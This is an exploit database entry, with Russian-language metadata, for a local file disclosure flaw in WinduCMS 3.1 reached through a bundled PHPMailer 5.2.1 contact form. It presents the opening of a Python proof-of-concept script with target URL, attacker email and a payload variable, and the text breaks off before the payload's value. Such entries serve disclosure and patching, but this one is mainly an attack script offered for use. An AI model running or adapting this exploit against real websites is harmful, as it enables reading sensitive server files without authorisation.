WinduCMS 3.1 - Local File Disclosure

Свойства

Дата публикации:
06.12.2017
Цель:
WinduCMS 3.1
Тип воздействия:
Раскрытие важных данных

Код

#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#
 
from requests_toolbelt import MultipartEncoder
import requests
 
print("WinduCMS <= 3.1 Exploit")
  
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
payload = '